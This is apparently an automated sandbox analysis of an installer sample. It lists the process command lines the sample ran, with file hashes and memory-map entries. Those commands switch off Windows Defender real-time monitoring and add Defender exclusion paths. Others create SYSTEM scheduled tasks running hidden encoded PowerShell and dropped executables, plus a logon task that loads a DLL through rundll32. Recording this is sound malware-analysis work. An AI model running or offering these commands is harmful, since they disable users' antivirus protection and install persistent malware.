C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gGPOIrlNR"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe\" KP /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {EC6CFC43-B352-44AF-B53B-1AF5DE83BD95} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gspWoPfEo" /SC once /ST 21:48:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gspWoPfEo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gspWoPfEo"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gNzfrQBUu" /SC once /ST 10:16:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gNzfrQBUu"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gNzfrQBUu"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\grMXAHIUMHIHAuvw\frpukqJa\eqbdqfaWYhUUPtlL.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\grMXAHIUMHIHAuvw\frpukqJa\eqbdqfaWYhUUPtlL.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gYcgxhZvm" /SC once /ST 10:18:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gYcgxhZvm"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gYcgxhZvm"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biFxKMwOTZzXEKwTU" /SC once /ST 10:45:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe\" NQ /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "biFxKMwOTZzXEKwTU"

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe NQ /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWLKrWFeqGsUKIPSIT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SvbbHukzU\TThBQi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HvGgydgoxkjNzSQ" /V1 /F

Network

N/A

Files

memory/1424-54-0x0000000076151000-0x0000000076153000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

memory/544-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/1252-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/1252-71-0x0000000010000000-0x0000000011000000-memory.dmp

memory/1608-74-0x0000000000000000-mapping.dmp

memory/1644-75-0x0000000000000000-mapping.dmp

memory/1296-79-0x0000000000000000-mapping.dmp

memory/1616-78-0x0000000000000000-mapping.dmp

memory/824-82-0x0000000000000000-mapping.dmp

memory/1744-83-0x0000000000000000-mapping.dmp

memory/1076-87-0x0000000000000000-mapping.dmp

memory/1676-86-0x0000000000000000-mapping.dmp

memory/276-90-0x0000000000000000-mapping.dmp

memory/1128-92-0x0000000000000000-mapping.dmp

memory/924-94-0x0000000000000000-mapping.dmp

memory/924-95-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmp

memory/924-96-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

memory/924-97-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

memory/924-98-0x00000000028B4000-0x00000000028B7000-memory.dmp

memory/924-99-0x000000001B790000-0x000000001BA8F000-memory.dmp

memory/768-100-0x0000000000000000-mapping.dmp

memory/924-102-0x00000000028BB000-0x00000000028DA000-memory.dmp

memory/924-101-0x00000000028B4000-0x00000000028B7000-memory.dmp

memory/2008-103-0x0000000000000000-mapping.dmp

memory/1348-105-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/1648-108-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/824-115-0x0000000000000000-mapping.dmp

memory/1076-116-0x0000000000000000-mapping.dmp

memory/1616-117-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 70481d0366bd1c0b3cf6c550095afe8d
SHA1 058d62c4b6da2cdd25b827bf8818283b6288a0dd
SHA256 d01e696c2013c4c4b89105f8659d686b92182d34366b7cee9f67ee3c7572e9b6
SHA512 ab5bce99c921ed897ac74c5bfe4794302b99c82241820e6e78cc84c6d45432fba225a68fddc76dae274f2b2b4438a9129f78fca24ac02e9452b7abbe9f9c6038

memory/1616-120-0x000007FEF3F30000-0x000007FEF4953000-memory.dmp

memory/1616-121-0x000007FEF33D0000-0x000007FEF3F2D000-memory.dmp

memory/1616-122-0x00000000022C4000-0x00000000022C7000-memory.dmp

memory/1396-123-0x0000000000000000-mapping.dmp

memory/1616-124-0x00000000022C4000-0x00000000022C7000-memory.dmp

memory/1616-125-0x00000000022CB000-0x00000000022EA000-memory.dmp

memory/1748-126-0x0000000000000000-mapping.dmp

memory/1188-127-0x0000000000000000-mapping.dmp

memory/912-128-0x0000000000000000-mapping.dmp

memory/1628-129-0x0000000000000000-mapping.dmp

memory/1160-130-0x0000000000000000-mapping.dmp

memory/1156-131-0x0000000000000000-mapping.dmp

memory/976-132-0x0000000000000000-mapping.dmp

memory/1060-133-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 52e810fd32d3a9d1c4cdb81ebbbecdda
SHA1 36893682b5f7c5972d9949124684b9b6cd8327c5
SHA256 9d185cf11d6c7b0dda9acb43a9077624402d95ef1f52e84586c7bcc449c93f12
SHA512 df89a10ab8078027aaa4b06bdd69df1dd5136c56c22b9636f5430c8dd316594186c5ef09d939ca5bcb09ecfecd0b48824ac976fee790a09026aa9b2be64f6972

memory/1060-136-0x000007FEF3590000-0x000007FEF3FB3000-memory.dmp

memory/1060-137-0x000007FEF2A30000-0x000007FEF358D000-memory.dmp

memory/1744-139-0x0000000000000000-mapping.dmp

memory/1060-140-0x00000000027F4000-0x00000000027F7000-memory.dmp

memory/1060-141-0x00000000027FB000-0x000000000281A000-memory.dmp

memory/1128-142-0x0000000000000000-mapping.dmp

memory/1820-143-0x0000000000000000-mapping.dmp

memory/1368-144-0x0000000000000000-mapping.dmp

memory/1544-145-0x0000000000000000-mapping.dmp

